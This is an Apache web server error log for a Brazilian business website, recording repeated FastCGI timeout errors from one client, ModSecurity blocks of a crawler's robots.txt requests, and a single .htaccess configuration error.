[Sun Mar 15 15:01:17.121832 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:52638] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:01:39.129823 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:52790] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:02:00.078396 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52906] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:02:22.044139 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:53040] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:02:44.121868 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:53262] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:03:05.713830 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:53470] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:03:27.123430 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:53674] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:03:49.133859 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:53788] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:04:08.782832 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.244.31:54730] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abb0mLABkC4fWIHEf8GB-QAAAE4"]
[Sun Mar 15 15:04:10.056304 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:53906] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:04:31.069884 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:54038] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:04:52.129926 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:54194] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:05:13.121782 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:54396] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:05:22.665553 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.228.16:41798] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abb04rABkC4fWIHEf8GCQAAAAEs"]
[Sun Mar 15 15:05:34.081892 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:54532] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:05:56.125771 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:54718] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:06:17.129848 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:54892] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:06:38.045952 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:55090] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:06:59.045857 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:55324] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:07:20.122993 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55532] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:07:42.133891 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:55720] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:08:04.141454 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55890] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:08:25.857090 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55986] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:08:47.122076 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56140] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:09:08.129858 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:56316] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:09:31.745859 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56438] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:09:31.978996 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.244.31:38444] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abb125qj1wV0Si-Oked4ZQAAABU"]
[Sun Mar 15 15:09:53.137630 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:56614] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:10:14.130276 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:56734] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:10:30.606957 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.228.16:54122] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abb2FtSswJuvopo3lOj9EAAAAIs"]
[Sun Mar 15 15:10:35.133799 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:56880] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:10:57.105919 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:57100] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:11:18.120357 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57236] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:11:39.590180 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:57430] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:12:01.120359 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57608] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:12:22.129811 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:57774] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:12:43.041934 2026] [proxy_fcgi:error] [pid 21806:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:58004] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:13:05.121791 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:58198] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:13:26.088996 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:58326] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:13:47.129858 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:58454] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:14:09.075436 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:58642] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:14:31.141781 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58818] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:14:41.603917 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.244.31:46388] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abb3EbABkC4fWIHEf8GDGwAAAFU"]
[Sun Mar 15 15:14:53.065894 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58936] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:15:14.133807 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:59076] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:15:36.119463 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59334] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:15:57.069661 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:59554] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:16:18.134224 2026] [proxy_fcgi:error] [pid 21946:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59694] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:16:39.121835 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59834] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:17:00.121464 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:60026] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:17:21.137789 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:60208] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:17:42.133820 2026] [proxy_fcgi:error] [pid 21533:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:60396] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:18:03.081803 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:60572] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:18:25.138579 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:60736] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:18:46.140387 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:60962] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:19:08.141822 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:32908] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:19:30.125906 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:33112] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:19:55.124987 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33474] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:20:17.071047 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:33610] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:20:29.540261 2026] [core:alert] [pid 11972:tid 140411683178240] [client 66.249.74.169:50689] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Sun Mar 15 15:20:38.123720 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:33830] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:20:59.137093 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34086] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:21:20.261830 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:34266] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:21:41.128835 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34548] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:22:03.069874 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34872] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:22:24.128365 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35092] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:22:45.118513 2026] [proxy_fcgi:error] [pid 21533:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:35304] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:23:06.124210 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35430] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:23:28.129894 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:35598] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:23:49.133772 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:35766] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:24:10.053065 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:35964] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:24:31.057901 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36162] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:24:52.045852 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:36388] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:25:17.133816 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:36524] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:25:39.126504 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:36636] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:26:00.134910 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:36792] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:26:07.538509 2026] [:error] [pid 11972:tid 140411674785536] [client 74.7.244.31:50554] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abb5v5qj1wV0Si-Oked6UAAAAAg"]
[Sun Mar 15 15:26:16.457296 2026] [:error] [pid 21946:tid 140411599251200] [client 74.7.228.16:55942] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abb5yHbQATo66fKoS7zg1wAAANE"]
[Sun Mar 15 15:26:23.133833 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:36974] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:26:44.129896 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37260] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:27:05.119983 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:37472] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:27:32.125785 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:37634] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:27:53.125810 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:37780] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:28:14.061859 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:38000] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:28:36.072844 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38248] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:28:57.129204 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:38450] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:29:18.125786 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38610] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:29:39.121717 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:38822] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:30:00.137846 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:39020] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:30:21.129071 2026] [proxy_fcgi:error] [pid 21533:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:39158] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:30:42.126601 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:39316] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:31:03.128304 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:39418] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:31:13.909831 2026] [:error] [pid 21946:tid 140411607643904] [client 74.7.244.31:50664] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abb68XbQATo66fKoS7zhhQAAANA"]
[Sun Mar 15 15:31:20.091812 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.228.16:51218] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abb6-HjZBu2q05ozVU_swwAAAUg"]
[Sun Mar 15 15:31:24.125821 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:39658] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:31:45.137770 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:39868] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:32:07.129806 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40060] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:32:29.045828 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40248] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:32:54.042007 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:40454] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:33:16.129774 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:40574] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:33:38.129860 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:40750] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:34:00.141862 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:40910] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:34:22.133837 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:41046] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:34:43.131293 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:41174] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:35:04.132546 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:41380] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:35:26.133779 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:41650] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:35:47.021817 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:41888] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:36:08.129814 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:42198] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:36:29.133372 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42340] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:36:32.010050 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.244.31:47170] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abb8MHjZBu2q05ozVU_tWAAAAUM"]
[Sun Mar 15 15:36:43.279568 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.228.16:55156] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abb8O9SswJuvopo3lOj_wAAAAIg"]
[Sun Mar 15 15:36:50.129855 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:42534] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:37:11.129790 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:42676] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:37:33.121929 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:42830] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:37:54.137814 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:43058] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:38:16.081837 2026] [proxy_fcgi:error] [pid 21946:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:43302] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:38:38.125784 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:43438] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:39:01.129826 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43586] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:39:23.122007 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:43694] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:39:44.139582 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:43956] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:40:05.153774 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:44248] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:40:27.127885 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44612] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:40:48.134654 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:44902] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:41:09.129910 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:45158] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:41:30.129804 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:45428] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:41:52.045945 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:45790] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:41:55.652429 2026] [:error] [pid 21946:tid 140411674785536] [client 74.7.228.16:45836] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abb9c3bQATo66fKoS7zitwAAAMg"]
[Sun Mar 15 15:42:14.113970 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:46042] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:42:35.122235 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:46314] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:42:37.578939 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.244.31:59004] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abb9nZqj1wV0Si-Oked8OgAAABg"]
[Sun Mar 15 15:42:57.262079 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:46564] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:43:18.120972 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:46920] AH01075: Error dispatching request to : (polling)
